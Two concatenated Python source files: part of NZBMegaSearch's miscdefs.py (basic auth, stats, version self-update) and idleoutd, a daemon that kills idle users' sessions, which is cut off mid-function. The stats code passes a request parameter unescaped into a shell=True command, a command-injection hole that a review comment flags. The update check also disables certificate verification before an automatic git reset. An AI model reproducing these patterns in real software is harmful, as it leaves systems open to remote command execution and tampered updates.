    #~ sl = StreamToLogger(stderr_logger, logging.ERROR)
    #~ sys.stderr = sl
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class StreamToLogger(object):
    """Fake file-like stream object that forwards each written line to a
    logger instance at a fixed level."""

    def __init__(self, logger, log_level=logging.INFO):
        self.logger = logger
        self.log_level = log_level
        self.linebuf = ''

    def write(self, buf):
        # Trim trailing whitespace, then emit one log record per line.
        for chunk in buf.rstrip().splitlines():
            self.logger.log(self.log_level, chunk.rstrip())
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
def connectinfo():
    """Render the static connection-information page."""
    return render_template('connectinfo.html')
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class Auth:
    """HTTP basic-auth helpers and decorators for the Flask routes.

    Two credential sets exist: the general user (mode 0) and the optional
    config-area user (mode 1, which falls back to the general credentials
    when unset). Empty usernames in the settings disable the checks.
    """

    def __init__(self, cfgsetsp):
        #~ another instance to not use ptrs
        self.cfgsets = config_settings.CfgSettings()

    def check_auth(self, username, password, mode):
        """Return True when the supplied credentials match for this mode."""
        if mode == 0:
            if (username == self.cfgsets.cgen['general_usr'] and
                    password == self.cfgsets.cgen['general_pwd']):
                return True
        if mode == 1:
            if len(self.cfgsets.cgen['config_user']) != 0:
                if (username == self.cfgsets.cgen['config_user'] and
                        password == self.cfgsets.cgen['config_pwd']):
                    return True
            else:
                # No dedicated config user: accept the general credentials.
                if (username == self.cfgsets.cgen['general_usr'] and
                        password == self.cfgsets.cgen['general_pwd']):
                    return True
        return False

    def authenticate(self):
        """Sends a 401 response that enables basic auth"""
        retres = Response(
            'Could not verify your access level for that URL.\n'
            'You have to login with proper credentials', 401,
            {'WWW-Authenticate': 'Basic realm="Login Required"'})
        return retres

    def requires_auth(self, f):
        """Decorator guarding general routes; a no-op when no general user
        is configured. (The unreachable duplicate returns of the original
        implementation were removed.)"""
        @wraps(f)
        def decorated(*args, **kwargs):
            self.cfgsets.refresh()
            if len(self.cfgsets.cgen['general_usr']) != 0:
                auth = request.authorization
                if not auth or not self.check_auth(auth.username, auth.password, 0):
                    return self.authenticate()
            return f(*args, **kwargs)
        return decorated

    def requires_conf(self, f):
        """Decorator guarding the configuration routes.

        NOTE(review): unlike requires_auth this does not refresh the cached
        settings first — confirm whether that is intentional.
        """
        @wraps(f)
        def decorated(*args, **kwargs):
            if (len(self.cfgsets.cgen['config_user']) != 0 or
                    len(self.cfgsets.cgen['general_usr']) != 0):
                auth = request.authorization
                if not auth or not self.check_auth(auth.username, auth.password, 1):
                    return self.authenticate()
            return f(*args, **kwargs)
        return decorated
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class DownloadedStats:
    """Aggregates per-provider response-time statistics from the log file.

    Python 2 class (uses xrange and integer division for the median index).
    """
    #~ megatransfer
    def __init__(self):
        import urlparse
        cfgsets = config_settings.CfgSettings()
        self.cgen = cfgsets.cgen
        self.logsdir = SearchModule.resource_path('logs/nzbmegasearch.log')
        self.scriptsdir = SearchModule.resource_path('get_stats.sh')
        self.cfg_urlidx = []
        self.excludeurls= ['http://ftdworld.net', 'https://nzbx.co']
        if(cfgsets.cfg is not None):
            self.config = cfgsets.cfg
            # Remember the indexes of all non-builtin (user-added) providers.
            for i in xrange(len(self.config)):
                if(self.config[i]['builtin'] == 0):
                    self.cfg_urlidx.append(i)
    def get_generalstats(self,args):
        """Render response-time stats for one day; requires the stats key.

        Args:
            args: request parameters; 'key' must match stats_key, optional
                'd' selects a YYYY-MM-DD day (defaults to today).
        """
        log.info('Stats general have been requested')
        savedurl = []
        errstr = "WRONG KEY"
        if('key' not in args):
            return errstr
        else:
            if(args['key'] != self.cgen['stats_key']):
                return errstr
        daytochk = datetime.datetime.now().strftime("%Y-%m-%d")
        if('d' in args):
            daytochk=args['d']
        # NOTE(review): security — 'daytochk' comes straight from the request
        # and is interpolated into a shell=True command line; this allows
        # command injection and should be validated/escaped.
        subprocess.call([self.scriptsdir + ' '+self.logsdir + ' ' + daytochk ], shell=True, executable="/bin/bash")
        # The helper script writes "name elapsed" pairs, one per line.
        stat_info = {}
        with open("/tmp/logstats_gen") as infile:
            for line in infile:
                value = line.split()
                #~ print value
                #~ print line
                if(value[0] not in stat_info):
                    stat_info[value[0]] = []
                stat_info[value[0]].append( float(value[1]) )
        #~ print stat_info
        # Reduce each provider's samples to count/mean/median/min/max.
        stat_info_curated = []
        uidx = 0
        for key in stat_info.keys():
            meant = float(sum(stat_info[key]))/len(stat_info[key]) if len(stat_info[key]) > 0 else float('nan')
            mediant = sorted(stat_info[key])[len(stat_info[key])/2]
            stat_info_curated_t = {}
            stat_info_curated_t['succ_call'] = len(stat_info[key])
            stat_info_curated_t['name'] = key
            stat_info_curated_t['mean'] = meant
            stat_info_curated_t['median'] = mediant
            stat_info_curated_t['min'] = min(stat_info[key])
            stat_info_curated_t['max'] = max(stat_info[key])
            stat_info_curated.append(stat_info_curated_t)
            uidx += 1
        # Fastest providers (lowest median) first.
        stat_info_curated = sorted(stat_info_curated, key=itemgetter('median'))
        return render_template('stats_gen.html',stat_cur=stat_info_curated)
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class ChkServer:
    """Probes a configured provider by running a test search against it.

    Python 2 class (print statements). A probe issues a search for 'Ubuntu'
    and inspects the HTTP return code or the boolean search result.
    """
    def __init__(self, cgen):
        self.cgen = cgen
        self.agent_headers = { 'User-Agent': 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1' }
    #~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
    def check(self, args):
        """Return 1 when the server described by ``args`` responds, else 0.

        Args:
            args: dict with 'hostname' and 'type' ('OMG', 'NAB', 'DSN' or
                'DS_GNG') plus type-specific credentials ('user'/'pwd'/'api').
        """
        ret = 0
        if(('hostname' in args) and ('type' in args)):
            # Perform the search using every module
            global globalResults
            if 'loadedModules' not in globals():
                SearchModule.loadSearchModules()
            #~ specials
            # OMG: builtin provider checked via login credentials.
            if(args['type'] == 'OMG'):
                ret = 1
                cfg_tmp = {'valid': 1,
                           'type': 'OMG',
                           'speed_class': 2,
                           'extra_class': 0,
                           'login': args['user'],
                           'pwd': args['pwd'],
                           'timeout': self.cgen['timeout_class'][2],
                           'builtin': 1}
                for module in SearchModule.loadedModules:
                    if( module.typesrch == 'OMG'):
                        module.search('Ubuntu', cfg_tmp)
                print cfg_tmp['retcode']
                if(cfg_tmp['retcode'][0] != 200):
                    ret = 0
            #~ server based API
            # NAB: newznab-style provider checked via its API key.
            if(args['type'] == 'NAB'):
                ret = 1
                cfg_tmp = {'url': args['hostname'],
                           'type': 'NAB',
                           'api': args['api'],
                           'speed_class': 2,
                           'extra_class': 0,
                           'valid': 1,
                           'timeout': self.cgen['timeout_class'][2],
                           'builtin': 0 }
                for module in SearchModule.loadedModules:
                    if( module.typesrch == 'NAB'):
                        module.search('Ubuntu', cfg_tmp)
                print cfg_tmp['retcode']
                if(cfg_tmp['retcode'][0] != 200):
                    ret = 0
            #~ server based WEB
            # DSN / DS_GNG: web-scrape providers checked through DeepSearch.
            if(args['type'] == 'DSN' or args['type'] == 'DS_GNG'):
                cfg_deep_tmp = [{'url': args['hostname'],
                                 'user':args['user'],
                                 'pwd': args['pwd'],
                                 'type': args['type'],
                                 'speed_class': 2,
                                 'extra_class': 0,
                                 'valid': 1,
                                 }]
                ds_tmp = DeepsearchModule.DeepSearch(cfg_deep_tmp, self.cgen)
                ret_bool = ds_tmp.ds[0].search('Ubuntu')
                if(ret_bool):
                    ret = 1
                else:
                    ret = 0
        return ret
#~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
class ChkVersion:
    """Compares the local version number against the GitHub repository and,
    on plain Linux installs, self-updates via git."""
    def __init__(self, debugflag=False):
        # On OpenShift the data dir is external; otherwise use the code dir.
        self.dirconf= os.getenv('OPENSHIFT_DATA_DIR', '')
        self.dirconf_local = os.path.dirname(os.path.realpath(__file__))+'/'
        if getattr(sys, 'frozen', False):
            # Frozen (bundled) builds live next to the executable.
            self.dirconf_local = os.path.dirname(sys.executable)+'/'
        # chk: -1 error / 0 up to date / 1 newer available; curver: local version.
        self.ver_notify = { 'chk':-1,
                            'curver': -1,
                            'os':-1}
        self.chk_update_ts = 0
        # Re-check at most every four hours.
        self.chk_update_refreshrate = 3600 * 4
        if(debugflag == False):
            self.chk_update()
    def chk_update(self):
        """Detect the platform and run a version check if the refresh period expired."""
        dt1 = (datetime.datetime.now() - datetime.datetime.fromtimestamp(self.chk_update_ts))
        dl = (dt1.days+1) * dt1.seconds
        if(dl > self.chk_update_refreshrate):
            if (sys.platform.startswith('linux') and len(self.dirconf)==0):
                self.ver_notify['os'] = 'linux'
            else:
                self.ver_notify['os'] = 'other'
            # A non-empty OPENSHIFT_DATA_DIR marks an OpenShift deployment.
            if (len(self.dirconf)):
                self.ver_notify['os'] = 'openshift'
            print '>> Checking for updates...'
            self.chk_local_ver()
            self.ver_notify['chk'] = self.chk_repos_ver()
            self.chk_update_ts = time.time()
    def chk_local_ver(self):
        """Read the local version from vernum.num (guarded by a magic string)."""
        verify_str = '80801102808011028080110280801102'
        usedir = self.dirconf_local
        if (len(self.dirconf)):
            usedir = self.dirconf
        # File format: '<magic> <version>'; the magic validates the file.
        with open(usedir+'vernum.num') as f:
            content = f.readlines()
        vals = content[0].split(' ')
        if(vals[0] == verify_str):
            self.ver_notify['curver'] = float(vals[1])
    def autoupdate(self):
        """Hard-reset the working tree to origin/master and re-exec the process."""
        #~ linux only, sorry win users
        if (sys.platform.startswith('linux') and len(self.dirconf)==0):
            #~ print 'MISCDEFS: THIS LINE HAS TO BE REMOVED BEFORE DEPLOYMENT'
            mssg = '>> Running autoupdate on Linux platform'
            print mssg
            log.info(mssg)
            # NOTE: discards any local changes before restarting in-place.
            subprocess.call(["git", "fetch"])
            subprocess.call(["git", "reset", "--hard", "origin/master"])
            pythonscr = sys.executable
            os.execl(pythonscr, pythonscr, * sys.argv)
    def chk_repos_ver(self):
        """Fetch the repository version; return 1 if newer, 0 if current, -1 on error."""
        verify_str = '80801102808011028080110280801102'
        url_versioning = 'https://raw.github.com/pillone/usntssearch/master/NZBmegasearch/vernum.num'
        #~ print 'MISCDEFS: TO REMOVE LINE IN AUTOUPD BEFORE DEPLOYMENT'
        try:
            # verify=False: certificate validation deliberately disabled here.
            http_result = requests.get(url=url_versioning, verify=False)
            #~ print http_result.text
            vals = http_result.text.split(' ')
            cur_ver = float(vals[1])
            if(vals[0] != verify_str):
                return -1
            if(self.ver_notify['curver'] < cur_ver):
                print '>> A newer version is available. User notification on.'
                #~ in case of supported platforms this is never executed, but autoupdated
                self.autoupdate()
                return 1
            else:
                if(self.ver_notify['curver'] == cur_ver):
                    print '>> This is the newest version available'
                return 0
        except Exception as e:
            mssg = str(e)
            print mssg
            log.critical(mssg)
            return -1
| AntonioMtn/NZBMegaSearch | miscdefs.py | Python | gpl-2.0 | 12,563 |
#!/usr/bin/env python
""" Marcos Moyano - marcos@anue.biz
Logout users of a specified period of idle time.
Copyright (c) 2006 Marcos Moyano
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License version 2 as published by
the Free Software Foundation.
"""
__revision__ = "$Id: idleoutd 2007-6-11 $"
import os, sys, smtplib
from time import sleep
from re import compile as comp
from re import match
from logging import fatal, info, warning, DEBUG, getLogger, Formatter
from logging.handlers import RotatingFileHandler
G_FILE = "/etc/group"
P_FILE = "/etc/passwd"
### Necesary data ###
USR_BY_NAME = {}
GROUP_BY_NAME = {}
PROCS = {}
NO_BANN = []
BANN = {}
PRINTINFO = 0
PRINTVERSION = "0.8.1"
LOG_FLAG = 0
####################
# Manage arguments #
####################
# Accept at most one CLI flag: debug, help, or version.
if len(sys.argv[1:]) == 1:
    DEBUGG = sys.argv[1]
    if DEBUGG == "-D" or DEBUGG == "-d" or DEBUGG == "--debug":
        PRINTINFO = 1
    elif DEBUGG == "-h" or DEBUGG == "--help":
        # NOTE(review): printhelp() is defined further down the module, so at
        # module-execution time this branch raises NameError -- confirm.
        printhelp()
        sys.exit(0)
    elif DEBUGG == "-v" or DEBUGG == "-V" or DEBUGG == "--version":
        print ("idleoutd version is: %s \n" % PRINTVERSION)
        sys.exit(0)
    else:
        print ("idleoutd: Invalid argument -- %s\n\
Try 'idleoutd -h' or 'idleoutd --help' for more information." % DEBUGG)
        sys.exit(1)
elif len(sys.argv[1:]) > 1:
    print ("To many arguments: %d recieved, 1 expected.\n\
Try 'idleoutd -h' or 'idleoutd --help'" % len(sys.argv[1:]))
    sys.exit(1)
#### End of manage arguments ####
##################
# Print Help Msg #
##################
def printhelp():
    """
    Print help information.

    Emits the usage text verbatim (Python 2 print statement).
    """
    print """Logout users of a specified period of idle time.
Usage: idleoutd [OPTION]
-D, -d, --debug Print debug information to the screen every 60 seconds.
-V, -v, --version Print version information and exit.
-h, --help Print this help and exit.
Report bugs to <marcos@anue.biz>."""
    return
#### End of print help ####
######################
# Define logging way #
######################
def logg(LOG_FILE, LOG_SIZE):
    """
    Configuration of the log file.

    Installs a RotatingFileHandler on the root logger (LOG_SIZE MiB per
    file, 10 backups) and sets the level to DEBUG.
    """
    RLOG = getLogger('')
    handler = RotatingFileHandler(LOG_FILE, 'a', LOG_SIZE * 1024 * 1024, 10)
    RLOG.addHandler(handler)
    RLOG.setLevel(DEBUG)
    # Syslog-style timestamps, e.g. 'Jun 11 12:00:00'.
    formatter = Formatter('%(asctime)s: %(levelname)-8s %(message)s','%b %d %H:%M:%S')
    handler.setFormatter(formatter)
    return
#### End of define logging ####
##################
# Get group info #
##################
def fetch_group(group, param):
    '''
    Fetch all the users in /etc/passwd with the same group id as "group".

    Args:
        group: group name to look up in /etc/group.
        param: configuration tokens to store alongside the member list.

    Side effects:
        Stores (members, param) under GROUP_BY_NAME[group] and returns
        the GROUP_BY_NAME dictionary.
    '''
    tmp = []
    gid = ""
    # Resolve the numeric gid of the requested group.
    # Files are opened via 'with' so the handles are closed even if a
    # malformed line raises (the previous version leaked them on error).
    with open(G_FILE, 'r') as mygfile:
        for lines in mygfile:
            line = lines.strip()
            name = line.split(':')[0]
            if group == name:
                gid = line.split(':')[2]
                break
    # Collect every passwd entry whose primary group matches that gid.
    with open(P_FILE, 'r') as mypfile:
        for lines in mypfile:
            line = lines.strip()
            guid = line.split(':')[3]
            if gid == guid:
                tmp.append(line.split(":")[0])
    GROUP_BY_NAME[group] = (tmp, param)
    return (GROUP_BY_NAME)
#### End of get group info ####
#################
# Group defined #
#################
def group_define(spar, param):
    """
    Fetch users from the specified group.

    spar is the group name; param holds 'key=value' tokens, param[0] being
    'idle=<minutes>'. Members of a group with idle=0 are added to the
    NO_BANN whitelist and removed from every group map.
    """
    idle_time = param[0].split("=")[1]
    GROUP_BY_NAME = fetch_group(spar, param)
    try:
        filed = open(G_FILE,'r')
        for lines in filed.readlines():
            line = lines.strip()
            if spar == str(line.split(':')[0]):
                # Supplementary members are the last colon-separated field.
                tmp = line.split(':')
                groups = tmp[len(tmp)-1]
        filed.close()
        lofusr = GROUP_BY_NAME[spar][0]
        groups = groups.split(',')
        # Merge primary-group members with supplementary members.
        for x in lofusr:
            if x not in groups:
                groups.append(x)
        if int(idle_time) == 0:
            # idle=0 means "never log out": whitelist and purge from groups.
            for x in groups:
                if x not in NO_BANN:
                    NO_BANN.append(x)
                for y in GROUP_BY_NAME.keys():
                    if x in GROUP_BY_NAME[y][0]:
                        GROUP_BY_NAME[y] = (GROUP_BY_NAME[y][0][1:], param)
                        if GROUP_BY_NAME[y][0] == []:
                            del GROUP_BY_NAME[y]
        else:
            for usr in groups:
                if usr not in NO_BANN:
                    GROUP_BY_NAME[spar] = (groups, param)
    except Exception, err:
        warning("%s -> %s " % (err.__class__ , err))
        warning("I was unable to open file %s." % G_FILE)
#### end of group definded ####
################
# User defined #
################
def usr_define(spar, param):
    """
    Fetch the specified user.

    spar is a user name from the config file; param holds its 'key=value'
    tokens (param[0] is 'idle=<minutes>'). idle=0 whitelists the user in
    NO_BANN; otherwise the config is stored in USR_BY_NAME.
    """
    try:
        filed = open(P_FILE,'r')
        for lines in filed.readlines():
            line = lines.strip()
            user = str(line.split(':')[0])
            if spar == user:
                itime = int(param[0].split('=')[1])
                if itime == 0:
                    # idle=0: never kick this user out.
                    if spar not in NO_BANN:
                        NO_BANN.append(spar)
                else:
                    if spar in NO_BANN:
                        NO_BANN.remove(spar)
                    USR_BY_NAME[spar] = param
        filed.close()
        # Warn about config entries that match no system account.
        if spar not in USR_BY_NAME.keys() and spar not in NO_BANN:
            info("Config file --> User %s is not defined in system." % spar)
    except Exception, err:
        warning("%s -> %s " % (err.__class__ , err))
        warning("I was unable to open file %s." % P_FILE)
#### end of user definded ####
##################
# Get info #
##################
def get_info(LOG_FLAG):
    """
    Parse the configuration file.

    Imports the settings from idleoutconf (found via sys.path), sets up
    logging once, records the SMTP settings in the global 'smtp', and
    feeds each 'name' and 'group' directive to usr_define/group_define.
    Returns the configured pid-file path.
    """
    try:
        from idleoutconf import log, logsize, pid, host, port, domain
        from idleoutconf import group, name
        if LOG_FLAG != 1:
            logg(log, int(logsize))
            # Don't open another logging instance!
            LOG_FLAG = 1
        global smtp
        smtp = [host, int(port), domain]
        # Normalise ' = ' to '=' inside each directive before tokenising.
        reg1 = comp('(\s+)\=(\s+)')
        for users in name:
            users = reg1.sub("=", users.strip())
            usrtmp = users.split()
            usrname = usrtmp[0]
            rest = usrtmp[1:]
            usr_define(usrname, rest)
        for groups in group:
            groups = reg1.sub("=", groups.strip())
            grtmp = groups.split()
            groupname = grtmp[0]
            rest = grtmp[1:]
            group_define(groupname, rest)
        return(pid)
    except Exception, err:
        print >> sys.stderr, "Error: %d: %s" % (err.errno, err.strerror)
        sys.exit(err.errno)
#### end get info ####
##################
# Compute info #
##################
def compute(process):
    """
    Manage all the information and call the require events.

    process maps 'user,device' -> (idle_minutes, pids). For each idle
    session the per-user config (USR_BY_NAME) takes precedence; otherwise
    the lowest idle threshold among the user's groups applies. BANN tracks
    grace-minute counters per session; once the counter reaches the grace
    value the session is killed (bann_usr), optionally with email.
    """
    # Drop grace counters for sessions that are no longer idle.
    tmp = [x for x, y in BANN.iteritems() if x not in process.keys()]
    for x in tmp:
        del BANN[x] # Clean people who got back
    for x, y in process.iteritems():
        user = x.split(',')[0]
        dev = x.split(',')[1]
        time = int(y[0])
        # Search in user define dictionary
        if USR_BY_NAME.has_key(user):
            idtm = int(USR_BY_NAME[user][0].split('=')[1])
            if time >= idtm:
                grace = int(USR_BY_NAME[user][1].split('=')[1])
                silent = USR_BY_NAME[user][3].split('=')[1]
                if x in BANN.keys():
                    # Already in grace period: kick when the counter expires.
                    if BANN[x] >= grace:
                        del BANN[x]
                        if silent == "no":
                            bann_usr(x, y[1], grace, 0) # Bann the user
                        else:
                            # Bann the user with silent
                            bann_usr(x, y[1], grace, 1)
                        mail = USR_BY_NAME[user][2].split('=')[1]
                        if mail == "yes":
                            send_mail(user, dev)
                    else:
                        BANN["%s" % x] = int(BANN[x]) + 1
                else:
                    # Start the grace period; only warn real ssh sessions.
                    ret = checkcon(x)
                    if ret == 0:
                        BANN["%s" % x] = 1
                        if silent == "no":
                            notify(user, dev, grace) # Notify the user
                    else:
                        # No ssh session - Banning with silent
                        bann_usr(x, y[1], grace, 1)
            else:
                if x in BANN.keys():
                    del BANN[x]
        else:
            """
            Group search:
            We'll grab the lowest idle configuration available. In addition we'll grab the
            corresponding grace and mail configuration for that particular user.
            By default we set the mail configuration to "no". If it needs to change it will do so.
            """
            # Big number just to make sure idle time is lower in the first run
            loweridt = 1000
            lowgrace = 0
            lowmail = "no"
            silent = "no"
            # Search in group define dictionary for the lowest idle time.
            for j, k in GROUP_BY_NAME.iteritems():
                if user in k[0]:
                    idtm = int(GROUP_BY_NAME[j][1][0].split('=')[1])
                    if idtm < loweridt:
                        loweridt = idtm
                        lowgrace = int(GROUP_BY_NAME[j][1][1].split('=')[1])
                        lowmail = GROUP_BY_NAME[j][1][2].split('=')[1]
                        silent = GROUP_BY_NAME[j][1][3].split('=')[1]
            if time >= loweridt:
                # Same state machine as the per-user branch above.
                if x in BANN.keys():
                    if BANN[x] >= lowgrace:
                        del BANN[x]
                        if silent == "no":
                            bann_usr(x, y[1], lowgrace, 0) # Bann the user
                        else:
                            # Bann the user with silent
                            bann_usr(x, y[1], lowgrace, 1)
                        if lowmail == "yes":
                            send_mail(user, dev)
                    else:
                        BANN["%s" % x] = int(BANN[x]) + 1
                else:
                    ret = checkcon(x)
                    if ret == 0:
                        BANN["%s" % x] = 1
                        if silent == "no":
                            notify(user, dev, lowgrace) # Notify the user
                    else:
                        bann_usr(x, y[1], lowgrace, 1)
            else:
                if x in BANN.keys():
                    del BANN[x]
#### End of compute ####
##################
# Notify user #
##################
def notify(user, dev, grace):
    """
    Notify the user that he is going to be kicked out.

    Writes a warning banner directly to the user's tty (/dev/<dev>);
    grace is the remaining grace period in minutes.
    """
    fdr = "/dev/"+dev
    seconds = grace*60
    try:
        tonot = open(fdr,'a')
        tonot.write("\n\r\n<<< MESSAGE FROM IDLEOUT >>>\n\n\
\r\tYou have been idle for too long.\n\
\r\tIf you don't send an alive signal in the next %d seconds you will be kicked out!\n\n\
\r<<< END OF MESSAGE >>>\n\n" % seconds)
        tonot.close()
        warning("USER %s idle on DEVICE %s --> NOTIFYING!" % (user, dev))
    except Exception, err:
        warning("%s -> %s " % (err.__class__ , err))
        warning("I was unable to open device %s." % fdr)
#### end of notify user ####
##########################
# check ssh connection #
##########################
def checkcon(info):
    """
    Look for the sshd process of the specified user in the specified device.

    info is a 'user,device' key. Returns 0 when a matching 'sshd: user@dev'
    process exists (interactive ssh session), 1 otherwise.
    """
    user = info.split(',')[0]
    device = info.split(',')[1]
    # Grep the process table for the session's sshd; fragile but portable.
    sshd = os.popen("ps -ef | grep %s | grep %s | grep sshd | grep -v \"grep\" | head -n 1" % (device, user), 'r')
    sshd = sshd.read()
    if sshd:
        sshd = sshd.strip().split()
    else:
        warning("USER %s not on DEVICE %s --> KICKING OUT!" % (user, device))
        return (1)
    # Column 5 '?' (no controlling tty) + 'sshd:' marks the session daemon.
    if sshd[5] == "?" and sshd[7] == "sshd:":
        if sshd[8].strip() == "%s@%s" % (user.strip(), device.strip()):
            return (0) # Found ssh session
    else:
        return (1) # There is no ssh session for the user in the device.
#### End of checkcon ####
###############
# Bann user #
###############
def bann_usr(user, pids, seconds, silent):
    """
    Kick out the specified user.

    user is a 'user,device' key, pids a whitespace-separated pid list,
    seconds the grace period in minutes (converted below), silent a 0/1
    flag suppressing the tty goodbye banner.
    """
    usr = user.split(',')[0]
    device = user.split(',')[1]
    seconds = int(seconds)*60
    fdr = "/dev/"+device
    warning("USER %s --> timeout on DEVICE %s --> KICKING OUT!" % (usr, device))
    if int(silent) == 0:
        try:
            tonot = open(fdr,'a')
            tonot.write("\n\r\n<<< MESSAGE FROM IDLEOUT >>> \n\n\
\r\tYour %s seconds has expired.\n\
\r\tKicking out user: %s\n\n\
\r<<< END OF MESSAGE >>>\n\n" % (seconds, usr))
            tonot.close()
        except Exception, err:
            warning("%s -> %s " % (err.__class__ , err))
            warning("I was unable to open device %s." % fdr)
    # SIGKILL every process of the session; failures are logged, not fatal.
    for process in pids.split():
        process = int(process)
        try:
            os.kill(process, 9)
        except Exception, e:
            warning("%s -> %s " % (e.__class__ , e))
            warning("Process don't exist or error killing it (%d)" % process)
#### End of bann user ####
#############
# Get pids #
#############
def get_pids(idle_pos, name_pos, dev_pos):
    """
    Find the idle info and processes of the users currently logged in.

    The *_pos arguments are 'start-end' column ranges for finger output,
    produced by get_pos(). Returns a dict mapping 'user,device' to
    (idle_minutes, 'pid pid ...'). Shadows the module-level PROCS.
    """
    PROCS = {}
    info1 = os.popen("finger | cut -c %s,%s,%s | sed 1d | egrep -v \"\*:0\" | sort | uniq" % (name_pos, dev_pos, idle_pos), "r")
    for line in info1:
        c = line.split()
        # Added to check differences between distros. Distros like SuSE use this.
        if "*" == c[1][0]:
            c[1] = c[1][1:]
        if c[0] not in NO_BANN:
            # Three fields means the Idle column is non-empty.
            if len(c) == 3:
                try:
                    t = int(c[2])
                except ValueError:
                    # 'hh:mm' -> minutes; '<n>d' -> days in minutes.
                    # NOTE(review): other formats leave 't' unbound and would
                    # raise NameError below -- confirm finger's idle formats.
                    if ":" in c[2]:
                        t = c[2].strip()
                        t = int(t.split(':')[0])*60 + int(t.split(':')[1])
                    elif "d" in c[2]:
                        t = c[2].strip()
                        t = int(t)*60*24
                # Collect every pid the user owns on that tty.
                lo = os.popen("ps -eo \"%s\" | awk '{print $3 \" \" $1 \" \" $2}' | grep %s | grep %s | egrep -v \"grep\" | awk '{print $2}' | xargs" % ("%p %y %U", c[0], c[1]), "r")
                for li in lo.readlines():
                    li = li.strip()
                    info("USER: %s --> DEVICE: %s --> IDLE TIME: %s --> PROCESSES: %s" % (c[0], c[1], str(t), li))
                    PROCS["%s,%s" % (c[0], c[1])] = (t, li)
    return(PROCS)
#### end of get_pids ####
##########################
# Check for SMTP service #
##########################
def check_smtp():
    """
    Check for the SMTP service.

    Attempts a connection to the configured host/port (global 'smtp');
    returns 0 when reachable, 1 otherwise.
    """
    try:
        server = smtplib.SMTP(smtp[0], smtp[1])
    except Exception, err:
        warning("%s -> Exit code %s -> Message: %s" % (err.__class__ , err[0], err[1]))
        return(1)
    server.quit()
    return(0)
#### end of check SMTP ####
#############
# Send mail #
#############
def send_mail(user, dev):
    """
    Send an email to the specified user explaining the situation.

    Uses the global 'smtp' = [host, port, domain]; when domain is "none"
    the bare user name is used as the address.
    """
    ecode = check_smtp()
    if ecode != 0:
        warning("An SMTP error ocurred. NOT sending email.")
        return
    # NOTE(review): the parent of this fork calls sys.exit(0) -- inside the
    # daemon this raises SystemExit in the main loop while the child sends
    # the mail and then continues the loop itself; confirm this is intended.
    pid = os.fork()
    if pid > 0:
        sys.exit(0)
    domain = smtp[2]
    if domain.lower() != "none":
        toaddrs = "%s@%s" % (user, domain)
        fromaddr = "%s@%s" % ("idleout", domain)
    else:
        toaddrs = user
        fromaddr = "idleout"
    line = "You have been idle for too long.\n\
Idleout has decided to terminate your conection on device %s.\n" % dev
    msg = ("From: %s\r\nTo: %s\r\n\r\n%s" % (fromaddr, toaddrs, line))
    try:
        server = smtplib.SMTP(smtp[0], smtp[1])
        server.set_debuglevel(0)
        server.sendmail(fromaddr, toaddrs, msg)
        server.quit()
        info("Email sent to user %s" % user )
    except Exception, err:
        warning("%s -> Exit code %s -> Message: %s" % (err.__class__ , err[0], err[1]))
        warning("An SMTP error ocurred. NOT sending email.")
#### end of send_mail ####
#####################
# Get Idle position #
#####################
def get_pos():
    '''
    Function to find the locations of "Name", "Tty" and "Idle" from the finger command.

    Returns three 'start-end' strings suitable for `cut -c`; computed once
    because the column layout differs between distributions.
    '''
    idle = os.popen("finger | head -n 1", "r")
    line = idle.readline().strip()
    tmp = line.find("Idle") + 1
    idle_pos = str("%d-%d" % (tmp - 1, tmp + 4))
    tmp = line.find("Name")
    name_pos = str("%d-%d" % (1, tmp))
    tmp = line.find("Tty")
    dev_pos = str("%d-%d" % (tmp, tmp + 7))
    return(idle_pos, name_pos, dev_pos)
#### End of get_pos ####
####################
# Print debug info #
####################
def prinfo(PROCS, usr_name, group_name, nobann, ybann, smtp):
    """
    Print the DEBUG information.

    Dumps the parsed config (SMTP, user and group directives), the
    whitelist, current idle sessions/processes and grace counters to
    stdout; called once per poll cycle in debug mode.
    """
    print " <<<<< DEBUG MODE >>>>> "
    print "---------------------------------------------------------"
    print " <<< SMTP DIRECTIVES FROM CONFIG FILE >>>\n"
    host = smtp[0]
    port = smtp[1]
    domain = smtp[2]
    print ("HOST: %s --> PORT: %d --> DOMAIN: %s" % (host, port, domain))
    print "---------------------------------------------------------"
    print " <<< USER DIRECTIVES FROM CONFIG FILE >>>"
    for name in usr_name.keys():
        print ("USER: %s " % name)
        tmp = " ".join(usr for usr in usr_name[name])
        print ("CONFIGURATION: %s" % tmp)
    print "---------------------------------------------------------"
    print " <<< GROUP DIRECTIVES FROM CONFIG FILE >>>"
    for group in group_name.keys():
        print ("GROUP: %s" % group)
        tmp = " ".join(usr for usr in group_name[group][0])
        tmp1 = " ".join(conf for conf in group_name[group][1])
        print ("USERS IN GROUP: %s" % tmp)
        print ("CONFIGURATION: %s" % tmp1)
        print "---------------------------------------"
    tmp = " ".join(usr for usr in nobann)
    print "---------------------------------------------------------"
    print ("USERS THAT WILL NEVER BE KICKED OUT: %s" % tmp)
    print "---------------------------------------------------------"
    print "IDLE USERS: "
    for info in PROCS.keys():
        user = info.split(',')[0]
        dev = info.split(',')[1]
